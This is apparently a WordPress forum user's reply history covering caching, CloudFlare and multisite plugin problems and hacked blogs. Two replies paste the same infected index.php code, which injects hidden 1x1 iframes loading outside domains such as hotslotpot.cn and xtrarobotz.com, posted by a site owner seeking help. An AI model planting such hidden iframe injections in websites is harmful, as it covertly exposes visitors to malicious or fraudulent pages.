Gauhar Kachchhi
Forum Replies Created
-
I had to give up on repairing the site…
So, I exported all posts to xml, copied the images folder, then created a new subsite, then imported the old site into it. Pasted all images into place via FTP. From Network admin dashboard, deleted old site and renamed new site url slug to match the old one…
The problem is now solved. I have a brand new site now… with all my old content.
If I completely disable all plugins, the subsite works. But if I enable any plugin, even Jetpack or Akismet, then the site and dashboard stops loading. Its all blank. The only way to recover is to FTP to the blog and delete the enabled plugin.
Other subsites in that multisite are not affected with this problem. Only one subsite has this problem.
Is there any solution to this problem?
I changed login url slug to admin using better security plugin.
Also, all my plugins have disappeared…
Here is the malicious code I had removed from functions.pho — https://pastebin.com/2Ryf1sRh
followed by
<div id="scricode486397491"></div>
from footer.phpSorry for directly pasting the entire code in the earlier post. Didn’t know the rules…
Forum: Plugins
In reply to: [Cloudflare] CloudFlare and WP Super Cache CDN Settings?Thank you @donncha
I am afraid to jump to VPS. I am not a programmer. So, I am stuck with shared hosting. I might jump to HostGator. It has good reviews. But I don’t know if it would be able to support my blogs.Thank you @cbunting99 for the advice.
After reading your post, I have installed DB Reloaded Fix and replaced WP Super Cache with Hyper Cache Extended which I have heard is faster. Also, there is some plugin “Use Google Libraries” which supposedly decreases load on servers by borrowing shared libraries from Google CDN.I cannot use Minify because I am afraid it would mess up my Google Adsense code.
Also, in cloudflare, set security to “Essentially Off” so that it does not turn back my visitors.
@john,
Thanks for the advice…Forum: Plugins
In reply to: [DB Cache Reloaded Fix] DB Cache Reloaded Fix for MultisiteI have enabled it on my Multisite https://articles.architectjaved.com and there have been no problems with it…
Forum: Plugins
In reply to: [Cloudflare] CloudFlare and WP Super Cache CDN Settings?My blogs are hosted on StableHost and I have enabled CloudFlare which is inbuilt into my webhost cpanel. ( https://www.architecture-student.com and https://www.civilprojectsonline.com )
I have also enabled WP Super Cache plugin PHP mode.
My blogs keep hitting CPU limit everyday. And there is downtime.
My question is, do I need WP Super Cache plugin when I have CloudFlare enabled? Both of them seem to be doing the same stuff… Are these two services messing up with my CPU time by essentially doing the same things twice, and in effect degrading my load times?
Any advice is appreciated…
Cheers!
Forum: Your WordPress
In reply to: Stripping out blog-related stuffI was working on accomplishing the same thing… converting a web 2.0 blog into a web 1.0 “website”. It involves some code editing.
You might want to check out the demo at https://wp.informationpile.com/
I had modified the Arclite theme by Digital Nature…
I am still working on it… the biggest problem being 301 redirecting hundreds of already indexed pages from the old website to the new blog…
Forum: Fixing WordPress
In reply to: WordPress hackedHere is what appears in my index.php file
<?php /* Short and sweet */ define('WP_USE_THEMES', true); require('./blog/wp-blog- header.php'); echo "<iframe src=\"https://xtrarobotz.com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; echo "<iframe src=\"https://nipkelo.net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; echo "<iframe src=\"https://internetcountercheck.com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; ?> <iframe src="https://hotslotpot.cn/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe> <iframe src="https://hotslotpot.cn/in.cgi?income66" width=1 height=1 style="visibility: hidden"></iframe> <iframe src="https://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe> <iframe src="https://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe> <iframe src="https://litecartop.cn/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>
What should I do now… All my blogs have been similarly hacked, even non-wordpress domains
Forum: Plugins
In reply to: Is this malicious code at work?Its a virul infection. I have the smae freaking problem. default-filters.php is one of the infected files. Here is what appears in my index.php file…
<?php /* Short and sweet */ define('WP_USE_THEMES', true); require('./blog/wp-blog- header.php'); echo "<iframe src=\"https://xtrarobotz.com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; echo "<iframe src=\"https://nipkelo.net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; echo "<iframe src=\"https://internetcountercheck.com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; ?> <iframe src="https://hotslotpot.cn/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe> <iframe src="https://hotslotpot.cn/in.cgi?income66" width=1 height=1 style="visibility: hidden"></iframe> <iframe src="https://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe> <iframe src="https://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe> <iframe src="https://litecartop.cn/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>
Forum: Plugins
In reply to: Version 2.7.1 got trojanI have the same problem… But the dumb thing is that not only by wordpress blogs but also my older websites have been hacked. This issue is not related to wordpress…
cuteqqqqqq, is your blog hosted with Dreamhost?
Forum: Fixing WordPress
In reply to: Error in deleting (posts, images, categories)Hell, I came here to find a solution… I have more than 300 old posts that I need to get rid off. I could have don it through PHPmyAdmin if I knew how to use that interface. I am now on WordPress 2.6, but the problem persists…